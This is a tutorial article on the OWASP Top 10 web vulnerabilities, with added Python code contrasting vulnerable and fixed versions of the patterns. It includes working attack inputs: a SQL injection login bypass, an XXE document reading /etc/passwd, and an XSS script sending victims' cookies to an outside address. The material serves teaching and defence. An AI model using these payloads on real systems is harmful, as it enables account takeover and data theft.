Real-World Examples for OWASP Top 10 Vulnerabilities

The OWASP (Open Web Application Security Project) Top 10 is a standard security guideline adopted by developers and security professionals across the industry. OWASP is a non-profit organization started in 2004 to help secure applications against common vulnerabilities.

As software development practices have evolved over the years, so has the nature of attacks. To stay relevant to present-day complex security vulnerabilities, OWASP keeps updating its vulnerability list based on current trends (OWASP is currently in its 2017 edition).

Having understood what the OWASP Top 10 standard is, let's look at each of them with a real-world example to aid our understanding.

1. Injection

SQL injection occurs when user-controlled input is appended to a SQL statement dynamically without input validation. In this case, the attacker may provide malicious input and alter the behaviour of the SQL statement to carry out their malicious actions. The attacker can use this to extract sensitive data, delete data, etc. Below are examples of vulnerable and non-vulnerable code snippets.

Vulnerable code:

uName = getRequestString("username");
uPass = getRequestString("userpassword");
sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'

Here uName and uPass are user-controlled. If an attacker submits uName as "admin" and the password as " OR 1 = 1 -- then the SQL statement will become something like

sql = 'SELECT * FROM Users WHERE Name ="admin" AND Pass ="" OR 1 = 1 --'

This makes the WHERE clause true and fetches records for the admin user. Using prepared statements remains the most popular and effective way to remediate this issue, as shown below.

Fixed code:

String Uname = // user input
String Upass = // user input
Connection connection = DriverManager.getConnection(…);
PreparedStatement statement = connection.prepareStatement(
    "SELECT * FROM Users WHERE Name = ? AND Pass = ?" );
statement.setString(1, Uname);
statement.setString(2, Upass);   // bind the password variable, not a literal
ResultSet rs = statement.executeQuery();
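The two snippets above, carried through against a real (in-memory SQLite) database as an added example that is not part of the original article; the Users table, the credentials and the demo() helper are constructed here. SQLite string literals are single-quoted, so the bypass is typed as ' OR 1 = 1 -- rather than the page's double-quoted form, and because the injected OR applies to the whole clause, the vulnerable query returns every row in the table.

```python
import sqlite3

def make_users_db() -> sqlite3.Connection:
    # Constructed stand-in for the page's Users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Name TEXT, Pass TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, uname: str, upass: str) -> list:
    # String concatenation, the pattern the page labels vulnerable. SQLite string
    # literals are single-quoted, so the quotes differ from the page's pseudocode.
    sql = "SELECT * FROM Users WHERE Name = '" + uname + "' AND Pass = '" + upass + "'"
    return conn.execute(sql).fetchall()

def login_fixed(conn, uname: str, upass: str) -> list:
    # Prepared statement: values travel separately from the SQL text, so a quote
    # or comment marker in the input is just characters inside the bound value.
    sql = "SELECT * FROM Users WHERE Name = ? AND Pass = ?"
    return conn.execute(sql, (uname, upass)).fetchall()

def demo() -> dict:
    conn = make_users_db()
    payload = "' OR 1 = 1 --"   # the page's bypass, single-quoted for SQLite
    return {
        "vulnerable_rows": len(login_vulnerable(conn, "admin", payload)),  # 2: every row
        "fixed_rows": len(login_fixed(conn, "admin", payload)),            # 0: no match
        "legit_rows": len(login_fixed(conn, "admin", "s3cret")),           # 1: admin only
    }
```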

2. Broken Authentication

Weak or missing authentication can allow attackers to compromise passwords and session tokens and ultimately gain access to the victim's account. Therefore, applications should use complex, securely random passwords and session tokens so that they cannot be guessed easily.

Apart from that, there should be security controls such as an account lockout policy and a password expiry policy to prevent applications from falling prey to automated brute-force attacks.

3. Sensitive Data Exposure

Data exposure can happen mainly in two ways. First, at rest: when data is stored in the system (file or database), it should be encrypted using a strong encryption mechanism. If this is not done and the storage service is compromised, the stored data may be leaked.

Second, in transit: data should be properly encrypted when sent across network channels. Thus, if it is intercepted along the way, the integrity of the sensitive data remains intact. This is called data protection in transit.

Note: Password fields should be hashed and then stored in the database. The reason is that hashing is a one-way mechanism. Thus, even if the database is compromised, the attacker will not be able to recover the password value from the password hash.

4. XML External Entities (XXE)

Quite a few applications use XML documents to exchange data between the server and the browser. Therefore, they need XML parsers to process that data. When a poorly configured XML parser is used to parse a malicious input XML document, it may evaluate the external entity references, carrying out the attacker's instructions. Below is an example of a malicious input XML document.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

In the above snippet, the external entity tells the parser to read the local "passwd" file on the server. In certain cases, this vulnerability may propagate into other attacks like SSRF (server-side request forgery), local file inclusion, remote code execution, DoS attacks, etc.

As remediation, it is suggested to disable resolution of external entities and disable support for XInclude.
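One way to apply that remediation in Python's standard library, as an added example that is not part of the original article: untrusted XML is first scanned with expat and rejected the moment a DOCTYPE declaration appears (entities can only be declared inside a DOCTYPE, so this refuses every XXE variant at once), and only documents that pass are handed to ElementTree. The two input documents, UnsafeXML and accepts() are constructed here.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

# Constructed inputs: the page's malicious document and a harmless one.
MALICIOUS_XML = (b'<?xml version="1.0" encoding="ISO-8859-1"?>\n'
                 b'<!DOCTYPE foo [<!ELEMENT foo ANY>'
                 b'<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
                 b'<foo>&xxe;</foo>')
BENIGN_XML = b'<?xml version="1.0"?><foo>hello</foo>'

class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DOCTYPE (and so possibly entities)."""

def reject_doctype(data: bytes) -> None:
    # Pass 1: let expat tokenise the document and abort as soon as a DOCTYPE
    # declaration starts. No entity is ever declared, so none can be resolved.
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE '{name}' is not allowed in untrusted XML")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)  # exceptions raised in a handler propagate from Parse()

def parse_untrusted(data: bytes) -> ET.Element:
    # Pass 2 only runs for documents that survived the DOCTYPE check.
    reject_doctype(data)
    return ET.fromstring(data)

def accepts(data: bytes) -> bool:
    # Convenience wrapper: True if the document is parsed, False if it is refused.
    try:
        parse_untrusted(data)
        return True
    except (UnsafeXML, xml.parsers.expat.ExpatError, ET.ParseError):
        return False
```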

5. Broken Access Control

Access control refers to the restrictions enforced on selected resources so that only the intended users can reach them. An application that does not implement proper access control may allow an attacker to access unauthorized functionality or data. Below is a real-life example of a vulnerable system that used user input without validation.

System #1: The application uses unvalidated data in a SQL statement that accesses account information from the database:

pstmt.setString(1, request.getParameter("acctNo"));
ResultSet results = pstmt.executeQuery( );

An attacker simply modifies the 'acctNo' parameter in the browser to send whatever account number they want and successfully accesses any user's account.

Service call: http://example.com/app/accountInfo?acct=1234
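System #1 reproduced and fixed against an in-memory SQLite table, as an added example that is not part of the original article; the Accounts table, its two rows and the function names are constructed here. The point it makes beyond the text: the prepared statement already rules out SQL injection, yet the query still trusts the account number, so the fix is to take the owner from the server-side session and make it part of the WHERE clause.

```python
import sqlite3

def make_accounts_db() -> sqlite3.Connection:
    # Constructed table: account 1234 belongs to user 1, account 5678 to user 2.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Accounts "
                 "(AcctNo INTEGER PRIMARY KEY, OwnerId INTEGER, Balance INTEGER)")
    conn.executemany("INSERT INTO Accounts VALUES (?, ?, ?)",
                     [(1234, 1, 500), (5678, 2, 900)])
    return conn

def account_info_vulnerable(conn, acct_no: str):
    # Same shape as the page's System #1: a prepared statement (no injection), but
    # the only input is the attacker-controlled acctNo request parameter.
    return conn.execute("SELECT AcctNo, Balance FROM Accounts WHERE AcctNo = ?",
                        (int(acct_no),)).fetchone()

def account_info_fixed(conn, session_user_id: int, acct_no: str):
    # The owner comes from the authenticated session, never from the request, and
    # is part of the query, so someone else's account number returns nothing.
    return conn.execute("SELECT AcctNo, Balance FROM Accounts "
                        "WHERE AcctNo = ? AND OwnerId = ?",
                        (int(acct_no), session_user_id)).fetchone()

def demo() -> dict:
    # User 1 is logged in and tampers with acctNo to request user 2's account.
    conn = make_accounts_db()
    return {
        "vulnerable": account_info_vulnerable(conn, "5678"),   # (5678, 900): leaked
        "fixed_other": account_info_fixed(conn, 1, "5678"),    # None: refused
        "fixed_own": account_info_fixed(conn, 1, "1234"),      # (1234, 500): allowed
    }
```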

6. Security Misconfiguration

This is the most common security vulnerability across many applications and systems. As developers use a variety of built-in tools and services during application development, they tend to keep the default settings provided, which is dangerous and leaves the application vulnerable.

Under normal circumstances, application configurations enable detailed error messages. So when an error occurs, the browser shows the user the full details, such as debug logging, stack traces, etc. Unfortunately, this exposes sensitive information such as component versions, which can be a problem if the component has known vulnerabilities that you have not fixed yet.

7. Cross-Site Scripting (XSS):

In cross-site scripting (XSS), attacker-controlled user input is added to the web page without validation or proper escaping. The attacker may then introduce malicious code to execute their JavaScript in the victim's browser. This can be used to redirect the victim to an attacker-controlled page, change UI elements of the page to deface it, or steal cookie details. Below is an example of a JavaScript payload that steals cookies and sends them to the attacker's server.

<script type="text/javascript">document.location="http://192.168.0.48:5000/?c="+document.cookie</script>
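The two defences the paragraph implies, shown server-side in Python as an added example that is not part of the original article: output escaping turns the payload above into inert text, and marking the session cookie HttpOnly keeps it out of document.cookie even if a script does run. The comment wrapper, cookie name and function names are constructed here.

```python
import html
from http.cookies import SimpleCookie

# Constructed attacker input: the cookie-stealing payload shown on the page.
PAYLOAD = ('<script type="text/javascript">document.location='
           '"http://192.168.0.48:5000/?c="+document.cookie</script>')

def render_comment_vulnerable(comment: str) -> str:
    # Raw interpolation: whatever the user typed becomes markup in the page.
    return '<div class="comment">' + comment + '</div>'

def render_comment_fixed(comment: str) -> str:
    # Escape for the HTML body context: < > & " ' become entities, so the browser
    # displays the payload as text instead of executing it.
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'

def session_cookie_header(token: str) -> str:
    # Defence in depth: an HttpOnly cookie is invisible to document.cookie, so the
    # page's payload cannot read it; Secure and SameSite limit where it is sent.
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    return cookie.output(header="Set-Cookie:")
```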

8. Insecure Deserialization:

The insecure deserialization vulnerability arises when an application deserializes user-provided serialized input without implementing security controls. A few popular deserializers, such as Python's pickle module and Java's readObject method, are known to be vulnerable to deserialization attacks. Using this, an attacker can perform remote code execution on the server, resulting in remote access.
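For the pickle case named above, the mitigation when the format cannot be replaced with a data-only one such as JSON, as an added example that is not part of the original article: an Unpickler subclass that allow-lists the globals a payload may reference, so anything else is refused before it is looked up. The allow-list, the sample session record and the out-of-list sample (a harmless datetime.date) are constructed here.

```python
import datetime
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    # Allow-list of globals a pickle may reference. pickle's "load means code
    # execution" comes from resolving arbitrary module.name pairs; refusing the
    # lookup closes that door for everything not listed here.
    ALLOWED = {"builtins": {"set", "frozenset", "bytearray"}}

    def find_class(self, module, name):
        if name in self.ALLOWED.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def accepts(data: bytes) -> bool:
    # True if the payload deserializes under the allow-list, False if refused.
    try:
        safe_loads(data)
        return True
    except pickle.UnpicklingError:
        return False

# Constructed samples: a plain session record built only from literals, and an
# object whose pickle references a global (datetime.date) outside the allow-list.
SESSION_PICKLE = pickle.dumps({"user": "bob", "roles": ["reader"]})
OUTSIDE_PICKLE = pickle.dumps(datetime.date(2020, 1, 1))
```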

9. Using Components with Known Vulnerabilities

Today, using free/open source software and third-party libraries is a very common practice in application development. Therefore, it is equally important to ensure the security of the open source and third-party components used in development. This practice of managing the security and licensing of open source and third-party software is also known as software composition analysis.

10. Insufficient Logging & Monitoring

To prevent a cyber attack and to act in case of one, logging and monitoring systems are the most crucial link in the security event management chain. They help detect and analyze the root cause of an attack. Incident monitoring solutions like Splunk and CyberArk help analyze endpoint logs and report malicious behaviour in the form of alarms. To act on these alarms, incident response solutions like Resilient, ForcePoint, and CrowdStrike can be used. They execute a set of predefined actions to help handle security threats.

Conclusion

Application developers and security engineers should test their codebases against common web vulnerabilities before publishing their applications in a production environment. This OWASP Top 10 list of web vulnerabilities can be used as a checklist in security testing.

Thank you all for going through the OWASP Top 10 with me. I hope you enjoyed reading.

By Admin
